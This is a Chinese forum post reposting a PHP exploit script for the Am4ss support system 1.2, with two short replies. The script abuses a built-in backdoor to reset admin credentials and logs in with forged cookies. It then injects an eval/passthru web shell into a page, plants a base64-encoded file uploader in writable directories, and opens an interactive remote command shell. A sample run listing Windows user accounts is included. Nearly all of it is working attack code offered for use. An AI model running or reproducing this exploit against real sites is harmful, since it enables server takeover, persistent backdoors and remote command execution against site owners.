am4ss支持系统1.2 PHP代码注入利用

上帝是只猪

1. <?
   
2. /*
   
3. + Title : Am4ss <= 1.2 , PHP Code Injection
   
4. | Download : am4ss.com
   
5. | Tested on: Windows xp sp3 , CentOs
   
6. | Author : Faris , aka i-Hmx
   
7. Time line :
   
8. > 10/2011 , Vulnerability discovered
   
9. > till now , i haven't reported the vendor , why!!!
   
10.    The idiot backdoored it by himself + the official site is fucked up ;)
    
11. > 19/07/2012 , Public Disclosured
    
12.   
    
13. C:\lab>php am4ss.php localhost /lab/am4ss/
    
14. +---------------------------------------+
    
15. |      Am4SS , PHP Code Injection       |
    
16. |         Exploited By i-Hmx            |
    
17. |                                       |
    
18. +---------------------------------------+
    
19. | Testing Authentication
    
20. | Injecting our Evil php code
    
21. | Searching for Injected PageID
    
22.      => 0
    
23.      => 1
    
24.      => 2
    
25.      => 3
    
26.      => 4
    
27.      => 5
    
28. | Injected ID is 5
    
29. | I Have wrriten Tiny uploader at :
    
30.    + localhost/lab/am4ss//am4ss_cache/fa.php
    
31.    + localhost/lab/am4ss//templates/fa.php
    
32. | sec4ever shell online ;)
    
33. [url=mailto:i-Hmx@localhost]i-Hmx@localhost[/url]# net user
    
34. User accounts for \\
    
35. -------------------------------------------------------------------------------
    
36. Administrator            ASPNET                   Guest
    
37. HelpAssistant            IUSR_PHOENIX-XP          IWAM_PHOENIX-XP
    
38. PhoeniX                  PhoeniX.Limited          SUPPORT_388945a0
    
39. The command completed with one or more errors.
    
40.   
    
41. [url=mailto:i-Hmx@localhost]i-Hmx@localhost[/url]# exit
    
42. */
    
43. if(!$argv[2])
    
44. {
    
45. echo "\n+ usage : php ".$argv[0]." [Target without http://] /path/\nex : php ".$argv[0]." site.com /support/\n";
    
46. exit();
    
47. }
    
48. session_start();
    
49. echo "\n+---------------------------------------+\n";
    
50. echo "|      Am4SS , PHP Code Injection       |\n";
    
51. echo "|         Exploited By i-Hmx            |\n";
    
52. echo "|          [url=mailto:n0p1337@gmail.com]n0p1337@gmail.com[/url]            |\n";
    
53. echo "|       sec4ever.com , 1337s.cc         |\n";
    
54. echo "+---------------------------------------+\n";
    
55. $host=$argv[1];
    
56. $_SESSION['host']=$host;
    
57. $path=$argv[2];
    
58. $vic=$host.$path;
    
59. function kastr($string, $start, $end){
    
60.   $string = " ".$string;
    
61.   $ini = strpos($string,$start);
    
62.   if ($ini == 0) return "";
    
63.   $ini += strlen($start);
    
64.   $len = strpos($string,$end,$ini) - $ini;
    
65.   return substr($string,$ini,$len);
    
66. }
    
67. function get($url,$post,$cookies){
    
68. $curl=curl_init();
    
69. curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
    
70. curl_setopt($curl,CURLOPT_URL,"[url=http://]http://".$url[/url]);
    
71. curl_setopt($curl, CURLOPT_POSTFIELDS,$post);
    
72. curl_setopt($curl,CURLOPT_COOKIE,$cookies);
    
73. curl_setopt($curl,CURLOPT_FOLLOWLOCATION,0);
    
74. curl_setopt($curl,CURLOPT_TIMEOUT,20);
    
75. $exec=curl_exec($curl);
    
76. curl_close($curl);
    
77. return $exec;
    
78. }
    
79. /*
    
80. Enabling the Dirty Backdoor
    
81. */
    
82. $ok=kastr($vic,"[url=http://]http://","//[/url]");
    
83. if (!eregi($host,urlencode(get($vic."/libs/internals/core.assign_by_ref.php?password=ef211a58a6a04914923a7bf23a9a7f0c&username=%C7%E1%D4%D1%DE%C7%E6%ED&country=%C7%E1%E3%DB%D1%C8",'',''))))
    
84. {
    
85. die("+ Exploitation Failed :(");
    
86. }
    
87. /*
    
88. authenticating using the updated admin data
    
89. */
    
90. echo "| Testing Authentication\n";
    
91. if(!eregi('<td class="tfoot" align="middle" colSpan="2">',get($vic."/admincp/settings.php","",'Am4sS_CPCHERKAOUI_UserEmail=alert@am4ss.com;Am4sS_CPCHERKAOUI_PassWord=ef211a58a6a04914923a7bf23a9a7f0c')))
    
92. {
    
93. /*
    
94. login may failed due to bad connection , admincp path error , admin firewall .  .  . etc
    
95. any way u can use the following data to login manually
    
96. */
    
97. echo "| Authentication Failed\n| Try to login manually using :\n   + User : [url=mailto:alert@am4ss.com]alert@am4ss.com[/url]\n   + Password : kawkawa\n   | auth cookies : \n   + Am4sS_CPCHERKAOUI_UserEmail : [url=mailto:alert@am4ss.com]alert@am4ss.com[/url]\n   + Am4sS_CPCHERKAOUI_PassWord  : ef211a58a6a04914923a7bf23a9a7f0c \n+ Exiting \n";
    
98. die();
    
99. }
    
100. /*
     
101. Creating new page to inject our evil php code
     
102. */
     
103. $facode='echo "<pre>Faris on the mic ;)<br>";@eval(base64_decode($_REQUEST[fa]));echo "faris>>>";passthru(base64_decode($_SERVER[HTTP_CMD]));echo "<<<faris";';
     
104. echo "| Injecting our Evil php code\n";
     
105. get($vic."/admincp/pages.php?do=add",'do=save&title=farsawy&codetype=2&code='.$facode.'','Am4sS_CPCHERKAOUI_UserEmail=alert@am4ss.com;Am4sS_CPCHERKAOUI_PassWord=ef211a58a6a04914923a7bf23a9a7f0c');
     
106. echo "| Searching for Injected PageID\n";
     
107. /*
     
108. Trying to get the ijected pageid via testing 100 pages
     
109. i don't think it will exceed 10 pages after all :)
     
110. if this failed , retry exploitation and it will work as hell
     
111. */
     
112. for($f=0;$f<100;$f++)
     
113. {
     
114. $mypage=get($vic."/pages.php?pageid=$f","","");
     
115. echo "     => $f\n";
     
116. if(eregi(">>>",$mypage))
     
117. {
     
118. $_SESSION['id']=$f;
     
119. break;
     
120. }
     
121. }
     
122. $myid=$_SESSION['id'];
     
123. echo "| Injected ID is $myid\n";
     
124. /*
     
125. Injecting tinni file uploader at the cache and the templates directories
     
126. these usually chmoded to 777 by the admin
     
127. */
     
128. get($vic."pages.php?pageid=$myid&fa=JGNvZGUgPSBiYXNlNjRfZGVjb2RlKCJQRDl3YUhBTkNtVmphRzhnSnp4bWIzSnRJR0ZqZEdsdmJqMGlJaUJ0WlhSb2IyUTlJbkJ2YzNRaUlHVnVZM1I1Y0dVOUltMTFiSFJwY0dGeWRDOW1iM0p0TFdSaGRHRWlJRzVoYldVOUluVndiRzloWkdWeUlpQnBaRDBpZFhCc2IyRmtaWElpUGljN0RRcGxZMmh2SUNjOGFXNXdkWFFnZEhsd1pUMGlabWxzWlNJZ2JtRnRaVDBpWm1sc1pTSWdjMmw2WlQwaU5UQWlQanhwYm5CMWRDQnVZVzFsUFNKZmRYQnNJaUIwZVhCbFBTSnpkV0p0YVhRaUlHbGtQU0pmZFhCc0lpQjJZV3gxWlQwaVZYQnNiMkZrSWo0OEwyWnZjbTArSnpzTkNtbG1LQ0FrWDFCUFUxUmJKMTkxY0d3blhTQTlQU0FpVlhCc2IyRmtJaUFwSUhzTkNnbHBaaWhBWTI5d2VTZ2tYMFpKVEVWVFd5ZG1hV3hsSjExYkozUnRjRjl1WVcxbEoxMHNJQ1JmUmtsTVJWTmJKMlpwYkdVblhWc25ibUZ0WlNkZEtTa2dleUJsWTJodklDYzhZajVWY0d4dllXUWdVMVZMVTBWVElDRWhJVHd2WWo0OFluSStQR0p5UGljN0lIME5DZ2xsYkhObElIc2daV05vYnlBblBHSStWWEJzYjJGa0lFZEJSMEZNSUNFaElUd3ZZajQ4WW5JK1BHSnlQaWM3SUgwTkNuME5DajgrIik7CiRmID0gZm9wZW4oImFtNHNzX2NhY2hlL2ZhLnBocCIsInciKTsKJHQgPSBmb3BlbigidGVtcGxhdGVzL2ZhLnBocCIsInciKTsKZndyaXRlKCRmLCRjb2RlKTsKZndyaXRlKCR0LCRjb2RlKTs=","","");
     
129. echo "| I Have wrriten Tiny uploader at :\n   + $vic/am4ss_cache/fa.php\n   + $vic/templates/fa.php\n";
     
130. /*
     
131. printing sec4ever1337s via passthru()
     
132. to check if it's enabled or not
     
133. */
     
134. if (!eregi("sec4ever1337s",get($vic."/pages.php?pageid=$f&fa=cGFzc3RocnUoJ2VjaG8gc2VjNGV2ZXIxMzM3cycpOw==","","")))
     
135. {
     
136. echo "| passthru is disabled \n";
     
137. echo "| You can evaluate Your code at:\n    $vic/pages.php?pageid=$myid&fa=base64_encode(eval code)\n";
     
138. exit('+ Exiting');
     
139. }
     
140. echo "| sec4ever shell online ;)\n";
     
141. /*
     
142. if passthru() is enabled , then get small command executer
     
143. using Egix fsock method to send and retrieve data
     
144. */
     
145. function http_send($host, $packet)
     
146. {
     
147. $sock = fsockopen($host, 80);
     
148. fputs($sock, $packet);
     
149. return stream_get_contents($sock);
     
150. }
     
151. $packet  = "GET /{$path}/pages.php?pageid=$myid HTTP/1.0\r\n";
     
152. $packet .= "Host: {$host}\r\n";
     
153. $packet .= "Cmd: %s\r\n";
     
154. $packet .= "Connection: close\r\n\r\n";
     
155. while(1)
     
156. {
     
157. print "\ni-Hmx@".$_SESSION['host']."# ";
     
158. if (($fa = trim(fgets(STDIN))) == "exit") exit("\n+ Exiting");
     
159. $response = http_send($host, sprintf($packet, base64_encode($fa)));
     
160. $final=kastr($response,"faris>>>","<<<faris");
     
161. echo $final;
     
162. }
     
163. /*
     
164. woooooow , that really fucked my mind
     
165. But it was funny :D
     
166. Greets to all sec4ever members
     
167. C u Guys in another Bomb ;)
     
168. */
     
169. ?>
     
170. 
     

复制代码

love

没看懂 给点说明嘛